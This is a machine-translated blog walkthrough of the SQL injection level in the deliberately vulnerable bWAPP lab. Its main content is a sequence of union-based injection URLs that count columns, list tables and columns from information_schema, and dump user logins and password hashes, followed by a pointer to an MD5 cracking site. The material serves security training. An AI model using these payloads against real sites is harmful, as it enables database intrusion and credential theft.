当前位置:网站首页>SQL Injection (GET/Select)
SQL Injection (GET/Select)
2022-07-03 13:32:00 【this is hhhhp】

Choose a little bit , Observe URL, Only movie The value of is changing , and GET/Search Medium title It should be the same
Look at the type
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 or 1=1 &action=go1. Check the number of fields
http://192.168.3.95/bWAPP/sqli_2.php?movie=1 order by 7 &action=go2. View displayable fields
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,2,3,4,5,6,7 &action=go2,3,4,5 Is a displayable field

3. Blast storage
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,database(),3,4,5,6,7 &action=goLibrary name :bWAPP

4. Explosion meter
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() &action=goFound that only burst out 1 Tables

use group_concat() Put the watches together
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() &action=goThis time there is 5 It's a table. , We need to use it. users

5. Pop field
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'&action=goWe need to use it. login and password

6. Pop field content
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from bWAPP.users &action=go2 individual

7.MD5 Decrypt https://www.cmd5.com/
边栏推荐
- February 14, 2022, incluxdb survey - mind map
- MapReduce实现矩阵乘法–实现代码
- [Database Principle and Application Tutorial (4th Edition | wechat Edition) Chen Zhibo] [Chapter IV exercises]
- [today in history] July 3: ergonomic standards act; The birth of pioneers in the field of consumer electronics; Ubisoft releases uplay
- MySQL
- pytorch 载入历史模型时更换gpu卡号,map_location设置
- Realize the recognition and training of CNN images, and process the cifar10 data set and other methods through the tensorflow framework
- 已解决TypeError: Argument ‘parser‘ has incorrect type (expected lxml.etree._BaseParser, got type)
- Mycms we media mall v3.4.1 release, user manual update
- Can newly graduated European college students get an offer from a major Internet company in the United States?
猜你喜欢

Annotation and reflection

February 14, 2022, incluxdb survey - mind map

When updating mysql, the condition is a query

Servlet

Kivy tutorial how to automatically load kV files

Today's sleep quality record 77 points

Flink SQL knows why (XIV): the way to optimize the performance of dimension table join (Part 1) with source code

(first) the most complete way to become God of Flink SQL in history (full text 180000 words, 138 cases, 42 pictures)

rxjs Observable filter Operator 的实现原理介绍

TensorBoard可视化处理案例简析
随机推荐
The difference between stratifiedkfold (classification) and kfold (regression)
研发团队资源成本优化实践
Kotlin - improved decorator mode
Oracle memory management
Error handling when adding files to SVN:.... \conf\svnserve conf:12: Option expected
R语言gt包和gtExtras包优雅地、漂亮地显示表格数据:nflreadr包以及gtExtras包的gt_plt_winloss函数可视化多个分组的输赢值以及内联图(inline plot)
Spark实战1:单节点本地模式搭建Spark运行环境
[Database Principle and Application Tutorial (4th Edition | wechat Edition) Chen Zhibo] [Chapter 6 exercises]
2022-02-11 heap sorting and recursion
Fabric.js 更换图片的3种方法(包括更换分组内的图片,以及存在缓存的情况)
MapReduce实现矩阵乘法–实现代码
[Database Principle and Application Tutorial (4th Edition | wechat Edition) Chen Zhibo] [sqlserver2012 comprehensive exercise]
Spark practice 1: build spark operation environment in single node local mode
【被动收入如何挣个一百万】
71 articles on Flink practice and principle analysis (necessary for interview)
AI 考高数得分 81,网友:AI 模型也免不了“内卷”!
Comprehensive evaluation of double chain notes remnote: fast input, PDF reading, interval repetition / memory
The R language GT package and gtextras package gracefully and beautifully display tabular data: nflreadr package and gt of gtextras package_ plt_ The winloss function visualizes the win / loss values
人身变声器的原理
实现CNN图像的识别和训练通过tensorflow框架对cifar10数据集等方法的处理